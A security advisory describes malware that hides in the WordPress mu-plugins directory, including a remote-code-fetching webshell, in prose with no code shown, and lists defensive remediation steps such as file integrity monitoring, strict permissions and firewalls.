Analysis Summary

Threat actors are increasingly targeting WordPress websites by hiding malicious code within the mu-plugins directory, a critical folder that loads automatically with WordPress. This method enables attackers to maintain persistence while evading detection, making removal significantly harder. The malware variants discovered in this directory include redirect scripts, webshells, and spam injectors, all of which appear legitimate but serve malicious purposes. These scripts can redirect users to harmful domains, provide attackers with remote code execution capabilities, or manipulate website content for malicious distribution.

Security Researchers have observed that these malware strains are designed to bypass detection mechanisms. Attackers implement techniques that prevent search engine crawlers and privileged users from seeing malicious activity, ensuring their code remains hidden while maximizing its impact. As a result, infected websites suffer severe consequences, including reputation damage, data theft, malware distribution, and unauthorized modifications. The most harmful variant allows attackers to establish persistent access, facilitating long-term control over the compromised site.

One of the most concerning discoveries is a webshell disguised as a legitimate WordPress plugin, typically placed in the wp-content/mu-plugins/index.php location. This webshell executes arbitrary PHP code fetched from a remote server using cURL and the eval() function, allowing attackers to run commands with the same privileges as the web server. Such access can lead to a complete website takeover, enabling attackers to upload files, delete content, and steal sensitive information.

The presence of these sophisticated malware variants highlights the evolving tactics of cybercriminals and the increasing difficulty of detecting and removing threats embedded within WordPress environments. Website owners must implement strict security measures, such as monitoring file integrity, restricting write permissions, and utilizing advanced security plugins to detect anomalies. Proactive defense is essential to prevent these stealthy attacks from compromising websites and impacting visitors.

Impact

• Remote Code Execution
• Privilege Escalation
• Security Bypass

Affected Vendors

Remediation

• Regularly scan the mu-plugins directory and other critical WordPress files for unauthorized modifications.
• Use file integrity monitoring tools (e.g., Wordfence, Sucuri, or MalCare) to detect suspicious changes.
• Set strict file permissions (644 for files and 755 for directories) to limit unauthorized modifications.
• Restrict the ability to write or modify files in wp-content/mu-plugins.
• Review the mu-plugins directory and delete any suspicious or unrecognized files.
• Reinstall WordPress core files and legitimate plugins to ensure integrity.
• Deploy a WAF (e.g., Cloudflare, Sucuri, or ModSecurity) to block malicious requests targeting WordPress.
• Restrict plugin and theme installation to administrators only.
• Regularly audit installed plugins and remove unused or outdated ones.
• Keep WordPress, themes, and plugins up to date to patch vulnerabilities exploited by attackers.
• Disable XML-RPC and restrict REST API access if not needed.
• Change default login URLs and enforce strong authentication policies.
• Use security plugins that provide real-time scanning and automatic malware removal.
• Enable alerts for suspicious activities or file changes.
• Perform routine security audits to identify vulnerabilities and potential threats.
• Maintain frequent backups of website files and databases in a secure, offsite location for quick recovery.